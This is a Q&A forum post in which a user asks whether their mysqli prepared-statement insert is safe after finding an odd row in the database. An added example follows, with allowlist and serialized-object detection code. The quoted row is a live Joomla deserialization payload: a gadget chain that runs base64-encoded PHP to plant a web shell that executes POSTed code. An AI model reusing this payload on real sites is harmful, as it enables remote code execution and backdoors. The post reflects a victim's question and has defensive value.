Is this safe from SQL injection?

Time: 2018-07-19 00:50:47

Tags: mysql mariadb sql-injection

Today, I saw this in my SQL database:

| *some data*   | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�      |

I am using this code to put data into the database:

<?php
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);

$stmt->execute();
$stmt->close();
$conn->close();
?>

Am I safe?

Is my code safe? Or should I add another layer of security?

0 answers:

No answers
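An added example, not part of the original post: the same insert with the two things the bound `?` parameters do not cover, the interpolated table name and a check for serialized PHP objects like the one in the stored row. `ALLOWED_TABLES`, `looksLikeSerializedObject()` and `storeReading()` are hypothetical names, and the table names and sample values are constructed.

```php
<?php
// Added example, not the asker's code. ALLOWED_TABLES and both function
// names are hypothetical; the table names are constructed.
const ALLOWED_TABLES = ['readings', 'readings_archive'];

// True when $value carries a PHP serialized-object token such as
// O:21:"JDatabaseDriverMysqli":3:{ . In a bound parameter this is inert
// text; it only matters if code later feeds the column to unserialize().
function looksLikeSerializedObject(string $value): bool
{
    $token = '/(?:^|[;{|])[OC]:\d+:"[A-Za-z_\\\\][A-Za-z0-9_\\\\]*":\d+:\{/';
    return preg_match($token, $value) === 1;
}

function storeReading(mysqli $conn, string $table, string $value, string $device): bool
{
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // errors become exceptions

    // Identifiers cannot be bound with "?", so the table name is checked
    // against a fixed list before it is placed in the statement text.
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('Unknown table');
    }
    if (looksLikeSerializedObject($value)) {
        error_log('Rejected value containing a serialized PHP object');
        return false;
    }
    $stmt = $conn->prepare("INSERT INTO `$table` (VALUE, DEVICE) VALUES (?, ?)");
    $stmt->bind_param('ss', $value, $device);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Offline check of the detector on constructed samples; the second one
// is the beginning of the row quoted in the question.
$samples = [
    '23.5',
    '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}',
    'a:1:{i:0;s:4:"init";}', // serialized array without an object: not flagged
];
foreach ($samples as $s) {
    printf("%-5s %s\n", looksLikeSerializedObject($s) ? 'BLOCK' : 'ok', substr($s, 0, 40));
}
```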